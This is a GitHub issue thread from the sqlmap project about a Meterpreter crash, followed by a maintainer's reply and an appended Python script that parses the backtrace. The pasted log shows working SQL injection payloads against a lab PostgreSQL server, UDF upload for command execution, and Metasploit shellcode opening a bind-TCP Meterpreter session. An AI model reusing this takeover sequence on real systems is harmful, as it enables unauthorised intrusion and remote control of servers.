sqlmapproject / sqlmap

Automatic SQL injection and database takeover tool
http://sqlmap.org

sqlmap meterpreter error #2182

Closed ljesparis closed 7 years ago

ljesparis commented 7 years ago

I got this meterpreter error, with a 32-bit machine.

root@leoxnidas:/path/to/sqlmap# ./sqlmap.py -u "http://192.168.2.4/pgsql/get_brackets.php?id=1"
         _
 ___ ___| |_____ ___ ___  {1.0.9.32#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 12:00:18

when sqlmap detect sqlinjection will alert you with a beep sound, do you want to enable it? [Y/n] n
do you want to configure your requests? [y/N] 
do you want to increment tests level? [y/N] 
do you want to want to choose what data to retrive from dbms? [y/N] 
do you want to write a file to a victim machine? [y/N] 
do you want to read a victim file? [y/N] 
do you want to execute an victim operating system command? [y/N] 
do you want to execute a remote victim machine shell? [y/N] 
by default tor network will be used, would you like to desable it? [y/N] y
do you want to try bypass backend WAF/IPS/IDS if exists? [Y/n] n
Would you like to use metasploit? [Y/n] 
[12:00:25] [INFO] These options can be used to access the back-end database management system underlying operating system
[12:00:25] [WARNING] Metasploit was not found at /usr/share/metasploit-framework
Set metasploit correct location [/usr/share/metasploit-framework] /opt/metasploit/app
which explotation technique you want to use? [1]
[1] os-pwn
[2] os-smbrelay
[3] os-bof
> 1
do you want to perform a database process' user privilege escalation? [Y/n] 
[12:00:32] [INFO] fetched random HTTP User-Agent header from file '/home/leoxnidas/Escritorio/sqlmap_enviroment/sqlmap/txt/user-agents.txt': 'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7'
[12:00:33] [INFO] resuming back-end DBMS 'postgresql' 
[12:00:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:

---
Parameter: id (GET)
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: id=1);SELECT PG_SLEEP(5)--

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=1) UNION ALL SELECT NULL,NULL,(CHR(113)||CHR(98)||CHR(107)||CHR(113)||CHR(113))||(CHR(73)||CHR(83)||CHR(118)||CHR(120)||CHR(79)||CHR(120)||CHR(98)||CHR(72)||CHR(70)||CHR(116)||CHR(98)||CHR(84)||CHR(105)||CHR(79)||CHR(101)||CHR(78)||CHR(101)||CHR(66)||CHR(118)||CHR(80)||CHR(102)||CHR(111)||CHR(114)||CHR(99)||CHR(101)||CHR(89)||CHR(75)||CHR(82)||CHR(116)||CHR(98)||CHR(81)||CHR(101)||CHR(88)||CHR(66)||CHR(78)||CHR(103)||CHR(80)||CHR(120)||CHR(119)||CHR(79))||(CHR(113)||CHR(118)||CHR(113)||CHR(106)||CHR(113))-- JUrc

---
[12:00:33] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: PostgreSQL
[12:00:33] [INFO] fingerprinting the back-end DBMS operating system
[12:00:33] [INFO] the back-end DBMS operating system is Linux
[12:00:33] [INFO] testing if current user is DBA
[12:00:33] [INFO] detecting back-end DBMS version from its banner
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit
> 1
[12:00:34] [INFO] checking if UDF 'sys_bineval' already exist
[12:00:34] [INFO] checking if UDF 'sys_exec' already exist
[12:00:34] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)                  
[12:00:34] [WARNING] it is very important to not stress the network adapter during usage of time-based payloads to prevent potential disruptions 
[12:00:35] [INFO] the local file '/tmp/sqlmapr45oLF20957/lib_postgresqludf_sysfvl5Zw.so' and the remote file '/tmp/libslhid.so' have the same size (5100 B)
[12:00:35] [INFO] creating UDF 'sys_bineval' from the binary UDF file
[12:00:35] [INFO] creating UDF 'sys_exec' from the binary UDF file
how do you want to execute the Metasploit shellcode on the back-end database underlying operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Via shellcodeexec (file system way, preferred on 64-bit systems)
> 1
[12:00:37] [INFO] creating Metasploit Framework multi-stage shellcode 
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Bind TCP: Listen on the database host for a connection
2
what is the back-end DBMS address? [Enter for '192.168.2.4' (detected)] 
which remote port number do you want to use? [21214] 
which payload do you want to use?
[1] Shell (default)
[2] Meterpreter (beta)
> 2
[12:00:43] [INFO] creation in progress ................... done
[12:01:02] [INFO] running Metasploit Framework command line interface locally, please wait..
[12:01:02] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval', please wait..
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+

       =[ metasploit v4.12.25-dev                         ]
+ -- --=[ 1577 exploits - 901 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

PAYLOAD => linux/x86/meterpreter/bind_tcp
EXITFUNC => thread
LPORT => 21214
RHOST => 192.168.2.4
[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Starting the payload handler...
[*] Sending stage (1495599 bytes) to 192.168.2.4
[*] Meterpreter session 1 opened (192.168.2.10:42424 -> 192.168.2.4:21214) at 2016-09-24 12:02:33 -0400

[-] Session manipulation failed: Cannot allocate memory - infocmp ["/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:1815:in `get_term_capabilities'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:2027:in `_rl_init_terminal_io'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:2519:in `readline_initialize_everything'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:3804:in `rl_initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:4823:in `readline'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/input/readline.rb:132:in `readline_with_output'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/input/readline.rb:86:in `pgets'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/shell.rb:187:in `run'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/base/sessions/meterpreter.rb:473:in `_interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/interactive.rb:49:in `interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/command_dispatcher/core.rb:1968:in `cmd_sessions'", 
"/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:428:in `run_command'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:390:in `block in run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/command_dispatcher/exploit.rb:140:in `cmd_exploit'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:428:in `run_command'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:390:in `block in run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:233:in `block in initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:232:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:232:in `initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:62:in `new'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:62:in 
`driver'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:48:in `start'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/base.rb:82:in `start'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/msfconsole:48:in `<top (required)>'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `load'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `<main>'"]
[12:02:45] [INFO] cleaning up the database management system

do you want to remove UDF 'sys_exec'? [Y/n] 
[12:02:56] [INFO] database management system cleanup finished
[12:02:56] [WARNING] remember that UDF shared object files and Metasploit related files in the temporary folder saved on the file system can only be deleted manually
[12:02:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.2.4'

[*] shutting down at 12:02:56

stamparm commented 7 years ago

Please, let's stay with #2173. Also, this doesn't look like sqlmap's issue:

[-] Session manipulation failed: Cannot allocate memory - infocmp ["/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/activesupport-4.2.7.1/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:1815:in `get_term_capabilities'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:2027:in `_rl_init_terminal_io'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:2519:in `readline_initialize_everything'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:3804:in `rl_initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/rb-readline-r7-0.5.2.0/lib/rbreadline.rb:4823:in `readline'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/input/readline.rb:132:in `readline_with_output'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/input/readline.rb:86:in `pgets'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/shell.rb:187:in `run'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/post/meterpreter/ui/console.rb:66:in `interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/base/sessions/meterpreter.rb:473:in `_interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/interactive.rb:49:in `interact'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/command_dispatcher/core.rb:1968:in `cmd_sessions'", 
"/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:428:in `run_command'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:390:in `block in run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/command_dispatcher/exploit.rb:140:in `cmd_exploit'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:428:in `run_command'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:390:in `block in run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/rex/ui/text/dispatcher_shell.rb:384:in `run_single'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:233:in `block in initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:232:in `each'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/msf/ui/console/driver.rb:232:in `initialize'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:62:in `new'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:62:in 
`driver'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/console.rb:48:in `start'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/lib/metasploit/framework/command/base.rb:82:in `start'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems/metasploit-framework-4.12.25/msfconsole:48:in `<top (required)>'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `load'", "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/bin/msfconsole:23:in `<main>'"]
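
The attribution made in the reply above can be checked mechanically: every frame in the backtrace sits in a gem under the Metasploit install, and the exception surfaces where rb-readline's `get_term_capabilities` runs `infocmp` through a backtick call. The following is an added example, not code from sqlmap or Metasploit; `parse_frames`, `triage` and the five-frame excerpt of the trace are constructed here for illustration.

```python
import re

# Install prefix taken from the paths in the backtrace quoted above.
GEMS = "/opt/metasploit/apps/pro/vendor/bundle/ruby/2.3.0/gems"

# Five frames copied from that backtrace (innermost first); the rest are omitted.
FRAMES = [
    "activesupport-4.2.7.1/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'",
    "rb-readline-r7-0.5.2.0/lib/rbreadline.rb:1815:in `get_term_capabilities'",
    "rb-readline-r7-0.5.2.0/lib/rbreadline.rb:4823:in `readline'",
    "metasploit-framework-4.12.25/lib/rex/ui/text/shell.rb:187:in `run'",
    "metasploit-framework-4.12.25/lib/msf/ui/console/command_dispatcher/core.rb:1968:in `cmd_sessions'",
]
SAMPLE = ("[-] Session manipulation failed: Cannot allocate memory - infocmp ["
          + ", ".join(f'"{GEMS}/{f}"' for f in FRAMES) + "]")

# One Ruby backtrace entry: path:line:in `method'
FRAME_RE = re.compile(r"(/[^\s\":]+):(\d+):in `(.+?)'")
# Gem directory name: <name>-<version>, where the version starts with a digit.
GEM_RE = re.compile(r"/gems/([A-Za-z0-9_-]+?)-(\d[\w.]*)/")


def parse_frames(text):
    """Return (path, line, method, gem) tuples, innermost frame first."""
    text = text.replace("\n", "")  # undo terminal wrapping inside a frame
    frames = []
    for path, lineno, method in FRAME_RE.findall(text):
        gem = GEM_RE.search(path)
        frames.append((path, int(lineno), method, gem.group(1) if gem else None))
    return frames


def triage(text, root="/opt/metasploit/"):
    """Summarise which component raised the error and which ones it passed through."""
    frames = parse_frames(text)
    gems = list(dict.fromkeys(f[3] for f in frames if f[3]))  # ordered, de-duplicated
    return {
        "error": text.split(' ["', 1)[0],
        "raised_in": frames[0][3] if frames else None,
        "components": gems,
        "outside_root": [f[0] for f in frames if not f[0].startswith(root)],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

An empty `outside_root` list means no frame comes from code outside the Metasploit tree, which is the basis for treating the failure as local to the msfconsole process rather than to sqlmap.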